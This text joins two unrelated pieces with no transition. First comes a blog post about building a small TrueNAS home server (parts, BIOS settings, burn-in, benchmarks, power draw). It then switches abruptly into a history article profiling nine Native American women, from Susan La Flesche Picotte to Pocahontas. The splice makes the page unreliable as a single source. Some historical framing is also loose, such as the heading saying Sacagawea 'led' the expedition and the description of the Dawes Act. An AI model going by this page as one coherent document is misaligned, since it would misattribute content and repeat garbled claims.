Plan Ahead! Understand the rate that your storage grows so that you can craft a strategy to grow your storage down the road.
Being cheap today can and will paint you into a corner that’s quite expensive to get out of.
Understand that RAID is not a backup!
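Here is the price-per-terabyte comparison in practice; the prices below are hypothetical placeholders, not quotes:

```python
# Hypothetical prices -- plug in real quotes when you're shopping.
drives = {
    "12TB drive at $199": 199 / 12,   # ~$16.58 per TB
    "16TB drive at $289": 289 / 16,   # ~$18.06 per TB
    "20TB drive at $329": 329 / 20,   # ~$16.45 per TB
}
for name, per_tb in sorted(drives.items(), key=lambda kv: kv[1]):
    print(f"{name}: ${per_tb:.2f}/TB")
```

In this made-up example, the mid-sized drive is actually the worst deal per terabyte, which is exactly why the comparison is worth doing.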
Thankfully, I’ve collected a bunch of my own decommissioned hard drives, which I used to thoroughly test this DIY NAS build.
SATA Cables
One of the under-the-radar features of the
Topton N22 motherboard
might be one of my favorite features! The motherboard’s Asmedia ASM1164 SATA controllers sit behind two SFF-8643 connectors. These connectors provide two advantages for these motherboards:
The one thing that I have routinely disliked about building small form factor DIY NAS machines is the price tag that accompanies a small form factor (SFX) power supply like the one required by the JONSBO N4.
Regardless of whether it was called FreeNAS, TrueNAS, TrueNAS CORE, TrueNAS SCALE, or now
TrueNAS Community Edition
, the storage appliance product(s) from iXSystems have always been my go-to choice. For each yearly DIY NAS build, I wander over to the
TrueNAS Software Status page
and look at the state of the current builds.
I’m conservative with my personal NAS setup. However, for these blog builds, I typically choose Early Adopter releases. This year that’s
TrueNAS 25.10.0.1 (aka Goldeye)
. I enjoy being able to use these DIY NAS builds as a preview to the latest and greatest that TrueNAS has to offer.
I repeatedly choose TrueNAS because it’s what I’ve become accustomed to; it’s legitimately an enterprise-grade storage product, which is exactly the quality of solution that I want my data to depend on. At the same time, it does not feel like you need a specialized certification and a truckload of enterprise storage experience to set up a NAS that exceeds your needs at home.
Many times I have been asked, “Why not
<insert NAS appliance or OS here>
?” My answer to that question is, TrueNAS has always done everything that I need it to and they haven’t given me any reason to consider anything else. As a result, there’s never been a need for me to evaluate something else.
Hardware Assembly, BIOS Configuration, and Burn-In
Hardware Assembly
I wanted the smallest possible DIY NAS. The JONSBO N4 case initially felt too large since it accommodates Micro ATX motherboards, but I grew to accept its slightly larger footprint. Putting the Topton N22 motherboard into the case felt roomy and luxurious, and building the DIY NAS: 2026 Edition compared to prior years’ builds felt a lot like coming home to put on sweatpants and a t-shirt after wearing a suit and tie all day long.
I wasn’t too fond of the cable-management of the power supply’s cables. The layout of the case pretty much makes the front of the power supply inaccessible once it is installed. One consequence of this is that the power cable which powered the SATA backplane initially prevented the 120mm case fan from spinning up. That issue was relatively minor and was resolved with zip ties.
Overall, I felt pretty good about the assembly of the DIY NAS: 2026 Edition, but things took a turn for the worse when I decided to fill all the 3.5-inch drive bays up with some of my decommissioned 8TB HDDs. Now, this is probably my fault (I wouldn’t be surprised at all if the manual of the JONSBO N4 warned me against this), but putting the drives in last turned out to be a major pain in the neck for each of the four drive bays without a SATA backplane.
I had wrongly guessed that you access those drives’ power and data ports from the front of the case. I worked really hard to route the cables and even managed to install all of the drives before realizing my error and learning my lesson. I now understand why the JONSBO N4 is cheaper than all of its siblings: partly because there’s a missing SATA backplane, but also because the layout of those other four drive bays is frustrating.
Don’t let my last couple of paragraphs sour you on the JONSBO N4, though. I still really like its size, and it feels big when you’re working in it with a Mini ITX motherboard. If you wind up deciding to use the JONSBO N4, then I suggest that you put those four drives and their cables in first, before you do anything else; that would’ve made a world of difference for me. Actually looking at the documentation before getting started might have saved me quite a bit of aggravation, too!
If I have ruined the JONSBO N4 for you, then check out the JONSBO N3. Its eight 3.5-inch drive bays pair up really nicely with the Topton N22 motherboard. You can see what I thought of the JONSBO N3 by reading the DIY NAS: 2024 Edition blog.
BIOS Configuration
Generally speaking, I do as little as I possibly can in the BIOS. Normally I strive to only set the time and change the boot order. However, I did a bit more for the
DIY NAS: 2026 Edition
since I’m using the
SYS_FAN
header for the fan which is responsible for cooling the hard drives. Here are the changes that I made in the BIOS:
Set the System Date and System Time to Greenwich Mean Time.
Under Advanced > Hardware Monitor, set SYS SmartFan Mode to Disabled and set the Manual PWM Setting (for SYS_FAN) to 180.
Set PWRON After Power Loss to Always On.
Under Boot, set Boot Option #1 to the TrueNAS boot device.
I’m not at all interested in venturing down the rabbit hole of trying to completely minimize how much power the NAS uses. However, I imagine there are some opportunities for power savings lurking in the BIOS. I didn’t go looking for them myself, but if you’re intrepid enough to do so, here are a few suggestions that I have to save some additional power:
Disable the onboard audio.
Disable any network interfaces that you don’t wind up using.
Tinker with the CPU settings.
Got other suggestions?
Share them in the comments!
Burn-In
Because all of the hardware is brand-new to me, and brand-new components are not guaranteed to be free of defects, I always do a little bit of burn-in testing to establish some trust in the hardware that I’ve picked out for each DIY NAS build. While I think doing some burn-in testing is critically important, I also think the value of subsequent burn-in testing drops the more of it you do. Don’t get too carried away; do your own burn-in testing in moderation!
I always use Memtest86+ to burn in the RAM, and I always run at least three passes. Typically, I run many more, because I tend to let the system keep running additional passes overnight. Secondarily, running that many passes gives the CPU a little bit of work to do, and there’s enough information displayed by Memtest86+ to give me confidence in the CPU and its settings.
Hard Drives
The failure rate of hard drives is highest when the drives are new and then again when they’re old. Regardless of the type of hard drives that I buy or when I buy them, I always do some disk burn-in. I tend to run Spearfoot’s Disk Burn-in and Testing script on all of my new drives. However, executing this script against all of the drives can take quite a long time, even if you use something like tmux to run the tests in parallel.
Initial TrueNAS CE Setup
There’s always a little bit of setup that I do for a new TrueNAS machine. This isn’t intended to be an all inclusive step-by-step guide for all the things you should do with your DIY NAS. Instead, it’s more of a list of things I kept track of while I made sure that the
DIY NAS: 2026 Edition
was functional enough for me to finish writing this blog. That being said, I do think your NAS would be rather functional if you decided to do the same configuration.
Updated the hostname to
diynas2026
Note: This is only to avoid issues with another NAS on my network.
Updated the timezone.
Enabled the following services and set them to start automatically.
SMB
SSH
NFS
Enabled password login for the
truenas_admin
user.
Note: If I were planning to use this DIY NAS long-term, I wouldn’t have done this. Using SSH keys for authentication is a better idea
.
Edited the TrueNAS Dashboard widgets to reflect the 10Gb interface (
enp1s0
).
Created a pool named
rust
which consisted of a single RAID-Z2 vdev using eight hard drives that I had sitting on my shelf after they were decommissioned.
Configured the Apps to use the
flash
pool for the apps’ dataset.
Made sure that the System Dataset Pool was set to
flash
.
Confirmed that there were Scrub Tasks set up for the
flash
and
rust
pools.
Created a dataset on each pool for testing;
flash-test
and
rust-test
Installed the
Scrutiny
app found in the App Catalog.
If I were planning to keep this NAS and use it for my own purposes, I would also:
As the NAS is seeded with data, create and maintain a suite of
snapshot tasks
tailored to the importance of the different data being stored on the NAS.
Set up S.M.A.R.T. tests for all of the drives:
Weekly Short Test
Monthly Long Test
Benchmarks
Just about every year, I benchmark each DIY NAS build and almost always come to the same conclusion: the NAS will outperform your network at home. Your first bottleneck is almost always going to be the network, and the overwhelming majority of us have gigabit networks at home–but that’s slowly changing, since 2.5Gbps and 10Gbps network hardware has started to get reasonably priced lately.
Even though I always come to the same conclusion, I still like to do the benchmarks for two reasons:
It helps me build confidence that the
DIY NAS: 2026 Edition
works well.
People tend to enjoy consuming benchmarks
and
it’s fun for me to see the DIY NAS’ network card get saturated during the testing.
Throughput
I like to do three categories of tests to measure the throughput of the NAS:
Use
iperf3
to benchmark throughput between my NAS and another machine on my network.
Benchmark the throughput of the pool(s) locally on the NAS using
fio
.
Set up SMB shares on each of the pools and then benchmark the throughput when using those shares.
What do I think these benchmarks and my use of the
DIY NAS: 2026 Edition
tell me? In the grand scheme of things, not a whole lot.
However, these benchmarks do back up what I expected: the DIY NAS: 2026 Edition is quite capable and more than ready to meet my storage needs. I especially like that the CrystalDiskMark benchmarks of both SMB shares were faster than a SATA SSD, and that the throughput to the share on the flash pool practically saturated the NAS’ 10GbE network connection.
FIO Tests
Every time I benchmark a NAS, I seem to either be refining what I tried in prior years or completely reinventing the wheel. As a result, I wouldn’t recommend comparing these results with results that I shared in prior years’ DIY NAS build blogs. I haven’t really put a ton of effort into developing a standard suite of benchmarks. Things in my homelab change enough between DIY NAS blogs that trying to create and maintain an environment for a standard suite of benchmarks is beyond what my budget, spare time, and attention span will allow.
I’m going to paste these
fio
commands here in the blog for my own use in future DIY NAS build blogs. If you wind up building something similar, these
might
be helpful to measure your new NAS’ filesystem’s performance and compare it to mine!
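As a rough, hypothetical sketch of the kind of fio jobs that measure sequential and random throughput against a dataset on a pool (the dataset path, sizes, and runtimes below are assumptions, not the exact commands behind the numbers in this blog):

```python
# Illustrative fio jobs wrapped in Python; adjust --directory to point at a
# dataset on the pool you want to test (assumed here: /mnt/rust/rust-test).
import subprocess

JOBS = [
    # (job name, access pattern, block size)
    ("seq-write", "write", "1M"),
    ("seq-read", "read", "1M"),
    ("rand-write", "randwrite", "4k"),
    ("rand-read", "randread", "4k"),
]

def run_fio(directory="/mnt/rust/rust-test", runtime=60):
    for name, pattern, block_size in JOBS:
        subprocess.run(
            [
                "fio",
                f"--name={name}",
                f"--directory={directory}",
                f"--rw={pattern}",
                f"--bs={block_size}",
                "--size=4G",
                "--numjobs=1",
                "--iodepth=16",
                "--ioengine=posixaio",
                f"--runtime={runtime}",
                "--time_based",
                "--group_reporting",
            ],
            check=True,
        )

if __name__ == "__main__":
    run_fio()
```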
One not-so-obvious cost of running a DIY NAS is how much power it consumes. While I specifically tried to pick components that are efficient in terms of power consumption, it’s also important to realize that all the other bells and whistles on the awesome Topton N22 motherboard consume power, too, and that the biggest consumer of power in a NAS is almost always the hard disk drives.
Thanks to my tinkering with
home automation
, I have a plethora of
smart outlets
which are capable of power monitoring. I used those smart outlets for most of my power monitoring, but I also have a Kill a Watt P400 that I use for some of the shorter tests:
Power consumed during a handful of specific tasks:
Idle while running TrueNAS
RAM Burn-in (~14 passes of Memtest86+)
An 8-hour throughput benchmark copying randomly-sized files to the NAS using SMB.
Total consumed during the build, burn-in, and use of the
DIY NAS: 2026 Edition
.
Task                  | Duration | Max Wattage | Avg. Wattage | Total Consumption
Boot                  | 10 min.  | 200.00 W    | 120.00 W     | 0.02 kWh
Idle                  | 3 hr.    | 90.00 W     | 66.67 W      | 0.20 kWh
RAM Burn-in           | 18 hr.   | 104.00 W    | 91.67 W      | 1.65 kWh
SMB Benchmark of HDDs | 8 hr.    | 107.00 W    | 85.00 W      | 0.68 kWh
Total                 | 108 hr.  | 237.80 W    | 66.49 W      | 7.17 kWh
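For a rough sense of what the idle draw costs over a year, here’s the back-of-the-napkin arithmetic; the electricity rate is an assumption, so substitute your own:

```python
# Back-of-the-napkin annual cost of the idle draw measured above.
idle_watts = 66.67        # average idle wattage from the table above
rate_per_kwh = 0.12       # assumed electricity rate in USD per kWh
hours_per_year = 24 * 365

kwh_per_year = idle_watts * hours_per_year / 1000    # ~584 kWh per year
cost_per_year = kwh_per_year * rate_per_kwh          # ~$70 per year
print(f"~{kwh_per_year:.0f} kWh/yr, roughly ${cost_per_year:.0f}/yr")
```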
What about an EconoNAS?
Shortly before prices skyrocketed, I decided I wasn’t very interested in doing a separate EconoNAS build. Several months ago, I realized that there were several off-the-shelf NAS machines that were more than capable of running TrueNAS, and they were selling at economical prices that couldn’t be topped by a DIY approach. I will dive deeper into this in a future blog, eventually …
maybe
?
All that being said–it’d be incredibly easy to make some compromises which result in the
DIY NAS: 2026 Edition
becoming quite a bit more economical. Here’s a list of changes that I would consider to be more budget-friendly:
Altogether, these savings could add up to more than $400, which is pretty considerable! If you made all of these changes, you’d have something that’s going to be nearly equivalent to the
DIY NAS: 2026 Edition
but at a fraction of the price.
What am I going to do with the DIY NAS: 2026 Edition?!
My DIY NAS is aging quite gracefully, but I’ve recently been wondering about replacing it. Shortly before ordering all the parts for the
DIY NAS: 2026 Edition
, I briefly considered using this year’s DIY NAS build to replace my personal NAS. However, I decided not to do that. Then prices skyrocketed and I shelved the idea of building a replacement for my own NAS and I nearly shelved the idea of a DIY NAS in 2026!
So that begs the question, “What is Brian going to do with the
DIY NAS: 2026 Edition
?”
I’m going to auction it off on the
briancmosesdotcom store on eBay
! Shortly after publishing this blog, I’ll list it on eBay. In response to skyrocketing prices for PC components, I’m going to do a no-reserve auction. At the end of the auction, the highest bidder wins and hopefully they’ll get a pretty good deal!
Final Thoughts
Overall, I’m pleased with the
DIY NAS: 2026 Edition
. The
Topton N22 motherboard
is a significant improvement over last year’s
Topton N18 motherboard
, primarily due to its two extra SATA ports. Going from six SATA ports to eight works out to 33% more gross hard-drive capacity.
While testing, I found the
Intel Core 3 N355 CPU
somewhat excessive for basic NAS functions. However, the substantial untapped CPU horsepower offers luxurious performance potential. This makes the build compelling for anyone planning extensive self-hosting projects.
I have mixed feelings about the JONSBO N4 case. The four right-side drive bays lack SATA backplane connectivity, and without creative cabling solutions, replacing those individual drives becomes challenging. However, the case’s ~$125 price point compensates for this inconvenience, and I anticipate that the cost savings will justify the compromise for most builders. If I were to build the DIY NAS: 2026 Edition all over again, I’d be tempted to use the JONSBO N3 case or even the JONSBO N6, which isn’t quite obtainable yet.
The DIY NAS: 2026 Edition delivers excellent performance and superior specifications. In my opinion, it represents a better value than off-the-shelf alternatives. Building your own NAS also provides significant upgrade flexibility: years later, you can upgrade the RAM, motherboard, or case, or add PCI-e (x1) expansion cards, while off-the-shelf alternatives offer severely limited upgrade paths.
Stories about Native American women have long lingered in the shadows. Even accounts of well-known figures like Pocahontas are misunderstood. In fact, “Pocahontas” wasn’t even her real name.
Lesser known to history are women like Susan La Flesche Picotte, who went to medical school to treat her people, Buffalo Calf Road Woman, who knocked George Armstrong Custer off his horse, and Wilma Mankiller, who became the first female Principal Chief of the Cherokee Nation.
Facing oppression, racism, and sexism, the nine Native American women featured below fought to make the world a better place. They didn’t always succeed — but they did help clear a path for the generations that followed.
Susan La Flesche Picotte: The First Native American Woman To Receive A Medical Degree
Susan La Flesche Picotte became one of the few women of her day to go to medical school. (Photo in the public domain)
When Susan La Flesche Picotte was a girl, her father
asked
her and her sisters: “Do you always want to be simply called those Indians or do you want to go to school and be somebody in the world?”
Born to the Omaha people in 1865, La Flesche Picotte grew up in a world full of fracturing tribal traditions. Her father led one faction of the tribe, which believed that the Omaha needed to start accepting some white customs. The other faction, led by medicine men and traditionalists, called their rivals’ log cabins “The Village of the Make-Believe White Men.”
But La Flesche Picotte saw the need for some modernization. And she saw the need for a Native American to lead it. As a child, she remembered sitting with an old, sick woman who was waiting for a white doctor to treat her. Though he promised to come, he never did — and the woman died.
“It was only an Indian,” La Flesche Picotte recalled, “and it did not matter.”
Determined to make a difference, La Flesche Picotte enrolled in the Women’s Medical College of Pennsylvania. In 1886, she took the train across the country at age 21 so that she could become a doctor. Few women — of any race — in the late 19th century took such a step. At the time, male doctors had
claimed
that academic stress could make women infertile.
Undeterred, La Flesche Picotte graduated first in her class and became the first Native American woman to earn a medical degree. Though she was encouraged to practice on the East Coast, she chose to return home to the Omaha Reservation to treat vulnerable patients there. Before long, she became the primary physician for more than 1,200 people.
Sometimes, the work could be taxing. La Flesche Picotte often traveled for hours in inclement conditions to reach people, some of whom distrusted her unfamiliar diagnoses. But La Flesche Picotte kept at it — treating both Native American and white patients — and even raised enough money to build a modern hospital in the reservation town of Walthill, Nebraska.
She died in 1915, eulogized by both local priests and members of the Omaha.
Buffalo Calf Road Woman: The Native American Woman Who Knocked Custer Off His Horse
As the Battle of the Little Bighorn raged between U.S. troops and Native Americans in Montana, Lt. Col. George Armstrong Custer suddenly found himself facing a female fighter. Her name was Buffalo Calf Road Woman.
Not much is known about the woman who charged toward Custer, knocking him off his horse and quite possibly striking the final blow that killed him. Buffalo Calf Road Woman — also called Buffalo Calf Trail Woman or Brave Woman — was likely born in the 1850s to the Northern Cheyenne. She married a man named Black Coyote and had two children with him.
She first distinguished herself about a week before the Battle of the Little Bighorn during the Battle of the Rosebud. Then, Buffalo Calf Road Woman insisted on riding alongside male warriors as they set out to confront U.S. troops. Despite some grumbling from other fighters, they let her join.
During the battle, she sprang into action when she noticed that U.S. soldiers had trapped her brother, Chief Comes in Sight, in a gully. She rode straight into the melee, grabbed her brother, and pulled him onto her horse.
Her bravery impressed the other warriors, who dubbed the conflict “The Battle Where the Girl Saved Her Brother.” But Buffalo Calf Road Woman’s true claim to fame came about a week later, as the Northern Cheyenne, Lakota Sioux, and Arapaho faced off against Custer and his troops.
According to Wallace Bearchum, the Director of Tribal Services for the Northern Cheyenne, Buffalo Calf Road Woman acted bravely during the Battle of the Little Bighorn. Fighting “out in the open,” she
never took cover
during the conflict, and “she stayed on her horse the entire time.”
When Buffalo Calf Road Woman spotted Custer, she raised a club — and charged him. And according to the tribe’s oral history, her blow sent him flying off his horse, a move which may have led to his death.
Though the Cheyenne won the battle, they lost the larger war. Buffalo Calf Road Woman spent the rest of her short life fighting off attacks and seeking safety with her tribe. She died in 1879, likely of diphtheria.
Her story remained untold for over a century — but the Cheyenne never forgot about her. Fearing retribution, they kept their silence about the Battle of the Little Bighorn until 2005. Then, they told the world about Buffalo Calf Road Woman and the blow that may have very well killed Custer.
Lyda Conley: The First Native American Woman To Argue Before The Supreme Court
Lyda Conley boldly argued before the Supreme Court to save her tribe’s ancestral burial ground. (Public Domain photo)
When Eliza “Lyda” Burton Conley realized that white developers wanted to snatch up her tribe’s ancestral burial ground, she resolved to defend it. Conley got a law degree — no small feat for a woman in 1902 — and physically guarded the cemetery’s entrance with her musket.
“I will go to Washington and personally defend [the cemetery],” Conley
avowed
. “No lawyer could plead for the grave of my mother as I could, no lawyer could have the heart interest in the case that I have.”
Born to a mother from the Wyandotte tribe and an English farmer around 1868, Conley grew up in Kansas. She later learned that some developers wanted to repurpose the Huron Indian Cemetery, located in Kansas City, Kansas. As the city grew, it had become a valuable piece of land.
Conley had a personal stake in the matter. Her family had buried her mother and one of her sisters in the cemetery. But Conley also believed that an 1855 federal treaty with the Wyandotte protected the land from development.
Determined to make her case, she enrolled as one of the only women at the Kansas City School of Law and gained admission to the Missouri Bar in 1902. When Congress approved legislation to sell the land and move the bodies buried there four years later, Conley was ready to fight back.
First, she filed an injunction against the U.S. Secretary of the Interior and Indian Commissioners in the U.S. District Court. Then, Conley and one of her sisters set up camp in front of the cemetery. Armed with a gun, they built a shack called “Fort Conley” to discourage any potential trespassers.
The battle went all the way to the Supreme Court, where Conley became the first Native American woman to argue a case before the justices. They listened to her, but they ultimately sided with the developers.
Nevertheless, Conley continued to fight. She spent most of her time at the cemetery — until she was murdered during a robbery in 1946. After that, others picked up the baton, inspired by her devotion to the cause.
In 1971, the Huron Indian Cemetery was added to the National Register of Historic Places. And in 2017, it was designated a National Historic Landmark, preventing any development in the future. Lyda Conley didn’t live to see it, but the cemetery — where she too was buried — was saved.
Sarah Winnemucca: The Paiute Woman Who Stood Up For Her People
Sarah Winnemucca was the first Native American woman to write an English-language autobiography. (Photo: Wikimedia Commons)
Outraged at how white settlement had devastated her people, Sarah Winnemucca began to speak out. She traveled America in the 1880s and wrote a fiery autobiography called
Life Among the Paiutes
in 1883.
“For shame! For shame!” Winnemucca wrote. “You dare to cry out Liberty, when you hold us in places against our will, driving us from place to place as if we were beasts.”
Born Thocmetony (Shell Flower) to the Northern Paiute people, Winnemucca spent most of her life straddling the line between the “white” world and the “Native” world. She grew up traveling with her tribe in modern-day Nevada and Oregon, but she later attended a convent school in San Jose, California — until furious white parents forced her to leave.
Afterward, Winnemucca accompanied her family to their new reservation near Pyramid Lake in Nevada. Unfamiliar with the dry landscape — and victims of thefts by government agents who stole their aid money — many Paiutes starved to death. Winnemucca, who had mastered English from an early age, attempted to act as an interpreter for her people.
But it was tough work. Not only did Winnemucca have to work with cruel government agents like William V. Rinehart, but many of her own people grew to distrust her. Meanwhile, things for the Paiutes seemed to get worse and worse. So Winnemucca decided to speak out on their behalf.
Starting in San Francisco, Sarah Winnemucca traveled around the country and spoke her mind. Wearing traditional clothing and billing herself as a “princess,” Winnemucca described the hardships forced upon her people.
“I would be the first Indian woman who ever spoke before white people,” Winnemucca told a reporter, “and they don’t know what the Indians have got to stand sometimes.”
Her fearless activism eventually caught the eye of members of the Transcendentalist movement, who arranged for the publication of her autobiography. Pen in hand, Winnemucca didn’t hold back.
“Since the war of 1860 there have been one hundred and three (103) of my people murdered, and our reservation taken from us; and yet we, who are called blood-seeking savages, are keeping our promises to the government,” Winnemucca thundered. “Oh, my dear good Christian people, how long are you going to stand by and see us suffer at your hands?”
At first, her book seemed like it might make a difference. The president, Rutherford B. Hayes, and the U.S. government as a whole promised to help with reforms. But their words fell flat — and nothing changed.
Winnemucca spent some of her final years teaching at a Paiute school in Nevada before it was shut down due to the Dawes Act, which mandated that Indigenous children be taught in white-run schools. Though she died in 1891, her powerful testament to the plight of her people lives on.
Maria Tallchief: The Native American Woman Who Transformed Ballet
Maria Tallchief became the first Native American prima ballerina. (Photo: School of American Ballet)
As a girl growing up in early-20th-century Oklahoma,
Maria Tallchief
and her sister were often encouraged to act out “Indian” dances at country fairs.
“It wasn’t remotely authentic,” Tallchief later
wrote
of the experience.
“Traditionally, women didn’t dance in Indian tribal ceremonies. But I had toe shoes on under my moccasins, and we both wore fringed buckskin outfits, headbands with feathers, and bells on our legs. We’d enter from opposite wings, greet each other, and start moving to a tom-tom rhythm.”
But Tallchief’s early experiences didn’t dissuade her from pursuing dancing. The daughter of an Osage man and a Scottish-Irish woman, she’d found a passion for the craft and soon leaped into the world of ballet.
After training in Los Angeles, Tallchief moved to New York and snagged a part in Ballet Russe de Monte Carlo, a leading touring company, in 1942. There, Tallchief’s talent attracted the ire of some of the other dancers. But it also caught the eye of famed choreographer George Balanchine.
Before long, Tallchief became Balanchine’s muse — and briefly his wife. At Balanchine’s New York City Ballet, he even created a role specifically for Tallchief in his 1949 version of Stravinsky’s
The Firebird
.
In a rave review of Tallchief’s performance, a
New York Times
dance critic swooned that Balanchine had “asked her to do everything except spin on her head, and she does it with complete and incomparable brilliance.”
Tallchief also danced as the Swan Queen in Balanchine’s version of
Swan Lake
and the Sugar Plum Fairy in his version of
The Nutcracker
. Even after she and Balanchine divorced in 1950, she continued dancing with his company and other companies until the late 1960s. She later went on to work as a dance instructor and artistic director in Chicago.
Maria Tallchief, who died at age 88 in 2013, is remembered today as America’s first major prima ballerina, and the first Native American prima ballerina. But Tallchief always saw herself as a dancer above anything else.
“Above all, I wanted to be appreciated as a prima ballerina who happened to be a Native American, never as someone who was an American Indian ballerina,” she once said.
Nancy Ward: The Cherokee “War Woman” Who Fought For Peace
A statue of Nancy Ward that once stood in Tennessee. (Photo: Pinterest)
Nancy Ward
— born Nanyehi or “she who walks among the spirits” — became famous during a battle between the Cherokee and the Creek Nation in 1755. While chewing lead bullets for her husband to make them deadlier, she saw him fall and die on the battlefield. In response, she quickly grabbed his rifle, rallied the troops, and helped lead the Cherokee to victory.
Afterward, the Cherokee
bestowed
a new title upon her: Ghighau, a “Beloved Woman.” They also made her the head of the Women’s Council of Clan Representatives and gave her a vote on the Cherokee General Council.
But despite being known as a “war woman,” Ward was less interested in war than in peace. She’d grown up as the niece of a Cherokee chief named Attakullakulla, who believed that the Cherokee needed to coexist with British colonists in order to survive. Ward embraced his point of view.
As colonists increasingly pushed into Cherokee territory, Ward advocated for peaceful coexistence. And, for a short time, the Cherokee and the white settlers lived side by side. Ward even married a white man, Bryan Ward, and she learned how to make cheese and butter from a white woman settler.
Ward attempted to keep things peaceful even as the colonists continued to take tribal land. She discouraged the frequent Cherokee raids on white settlements. And when the American Revolutionary War broke out in 1775, Ward took the side of the colonists — even though most Cherokee wanted to take advantage of the situation to drive out the settlers.
When the colonists and the Cherokee tried to take steps toward a truce, they appointed Ward as their negotiator. She pleaded for peace.
“You know that women are always looked upon as nothing,” Ward said, “but we are your mothers; you are our sons. Our cry is all for peace; let it continue. This peace must last forever. Let your women’s sons be ours; let our sons be yours. Let your women hear our words.”
Although her efforts produced an uneasy truce, it didn’t last.
As time marched on, the settlers continued to gobble up Cherokee territory — and Ward’s once-powerful belief in peaceful coexistence began to fade. She was left to beg tribal leaders to not agree to a deal proposed by the U.S. government, which would exchange their tribal lands for different lands.
“We have raised all of you on the land which we now have. Your mothers, your sisters ask and beg of you not to part with any more of our land,” said Ward, who was about 80 years old by then.
Despite her protests — and the protests of other women — the deal went through. Ward died in 1822 as the last Ghigau of the Cherokee.
Sacagawea: The Shoshone Interpreter Who Led The Lewis And Clark Expedition
Sacagawea, as depicted on a mural alongside Lewis and Clark at the Montana House of Representatives. (Photo in the public domain)
When Meriwether Lewis and William Clark set out in 1804 to explore lands past the Mississippi River, they enlisted a French-Canadian trapper named Toussaint Charbonneau to be their interpreter and guide. Charbonneau brought along his 16-year-old wife, a Native American teenager named Sacagawea. In the end, she proved much more vital to the mission.
Before joining up with Lewis and Clark, Sacagawea had had a painful life. She was born to the Shoshone tribe around 1789 but was later kidnapped by a rival tribe, the Hidatsa. They eventually sold her to Charbonneau.
By the time Lewis and Clark appeared on the scene, Sacagawea was heavily pregnant. She gave birth to her son in February 1805, strapped him to her back, and joined up with the exploration party.
There, she proved indispensable. Her mere presence helped discourage attacks by other Native Americans, who saw her and her baby as a sign that Lewis and Clark were on a peaceful mission. Plus, she could also interpret Hidatsa and Shoshone languages, and identify edible plants and roots.
“The men who were complaining of the head ake and cholick yesterday and last night are much better to day,” Clark wrote in 1806. “[She] gathered a quantity of fenel roots which we find very paliatiable and nurushing food.”
She proved herself in other ways as well. When a boat flipped during a river crossing, Sacagawea not only saved herself and her son from drowning but also managed to gather important documents that had fallen into the water.
“The Indian woman… has been of great service to me as a pilot through this country,” Clark wrote.
But despite her invaluable work, Sacagawea received little more than recognition. After parting ways with Lewis and Clark, Charbonneau received $500 and 320 acres of land. Sacagawea did not get anything.
Wilma Mankiller: The Fearless Cherokee Chief
Chief Wilma Mankiller, pictured in 1993. (Photo: Judy Weintraub/The Washington Post)
In 1987, Wilma Mankiller did what no other Native American woman had done before — she became the Principal Chief of a major tribe.
During her tenure, which lasted until 1995, Mankiller oversaw a budget that grew to $150 million a year, watched Cherokee membership triple, and advocated for better education, healthcare, and housing services. And when she ran for reelection in 1991, she won 83 percent of the vote.
She fought hard to get there. Born to a Cherokee father and a white mother in 1945 in Oklahoma, Mankiller and her family were eventually forced to move to San Francisco as part of a relocation policy of the Bureau of Indian Affairs. It was, Mankiller later
reflected
, “my own little Trail of Tears.”
But living in California would change her life. As a teenager, Mankiller had a front-row seat to the social movements of the 1960s. And in 1969, she watched with awe and admiration as Native American activists occupied Alcatraz to raise awareness of the U.S. government’s treatment of Natives.
“When Alcatraz occurred, I became aware of what needed to be done to let the rest of the world know that Indians had rights, too,” Mankiller recalled.
Though she was married to an Ecuadorian businessman from 1963 to 1977, the pair ultimately divorced. Mankiller then returned home to Oklahoma with her two daughters. There, she volunteered with tribal affairs and started to work with the Cherokee Nation as an economic stimulus coordinator. Before long, Mankiller had founded the Community Development Department for the Cherokee Nation to help increase access to water and housing.
Her hard work caught the eye of Ross Swimmer, the tribe’s Principal Chief. He selected her as his running mate in his re-election campaign in 1983, making Mankiller the Deputy Chief of the Cherokee Nation.
When he resigned two years later, Mankiller took his place and later won the election in her own right in 1987. “Prior to my election,” she said, “Cherokee girls would have never thought that they might grow up and become chief.”
Though health problems forced Mankiller to step down in 1995, Mankiller remained heavily involved with the Cherokee Nation. Her legacy of hard work eventually earned her the Presidential Medal of Freedom in 1998.
She died in 2010 at age 64 and was soon memorialized as a trailblazer.
Pocahontas: One Of The Most Famous Native American Women In U.S. History
The only known depiction of Pocahontas that was made during her life. Circa 1616. (Photo in the public domain)
For many, the name “Pocahontas” conjures up lighthearted images of animated Disney characters. But
Pocahontas
was a real Native American woman whose story differs significantly from the famous Disney movie. Indeed, “Pocahontas” wasn’t even her real name.
Born around 1596, Pocahontas was named Amonute. She also had the more private name of Matoaka, and later picked up the nickname Pocahontas, which means “playful one.” The daughter of Chief Powhatan, Pocahontas likely spent her early life learning tasks assigned to Powhatan women.
But everything changed when Pocahontas was 11 years old. Then, in 1607, a group of English people arrived and started to settle in Jamestown. Pocahontas met one of the colonists that year: a man named John Smith.
In the Disney version of her story, Pocahontas falls in love with Smith. In reality, Pocahontas was just a child when she met him. And Smith claimed that he was captured by Pocahontas’s tribe — and feared for his life.
As Smith told it, the Powhatan tribe was about to execute him. But then, Pocahontas saved his life by throwing herself between him and his would-be executioner. However, many historians suspect that Smith misinterpreted what happened. One theory states that the “execution” was actually a tribal ceremony that formalized Smith’s place among the Powhatan.
But Smith’s encounter with the Powhatan did open up relations between the settlers and Native Americans. For a short while, they lived in peace and the Native Americans helped out the settlers by offering them supplies. But then, the settlers started demanding more and more supplies. Amid rising tensions, Smith returned to England for medical care.
After Smith left, Pocahontas continued to interact with the white settlers — though not always by choice. Around 1613, she was kidnapped by a group of English colonists and held for ransom. Since she was Chief Powhatan’s favorite daughter, Pocahontas tragically became a bargaining chip for the English in the midst of their many conflicts with the Powhatan.
During her captivity, she met
John Rolfe
, who became her husband and later brought her and their son to England. There, Pocahontas was exhibited as evidence of the settlers’ success in “taming” a “savage.” By that point, Pocahontas had converted to Christianity and taken on the name “Rebecca.”
She sadly died on the trip home — leaving no record of her own thoughts and reflections on her tragic, short, and historic life.
[
Kaleena Fraga
has been a senior staff writer for All That's Interesting since 2021 and is co-host of the History Uncovered Podcast. She graduated with a dual degree in American History and French Language and Literature from Oberlin College, previously ran the presidential history blog History First, and has had work published in The Washington Post, Gastro Obscura, and elsewhere. She has published more than 1,200 pieces on topics including history and archaeology. She is based in Brooklyn, New York.
Editor:
Cara Johnson
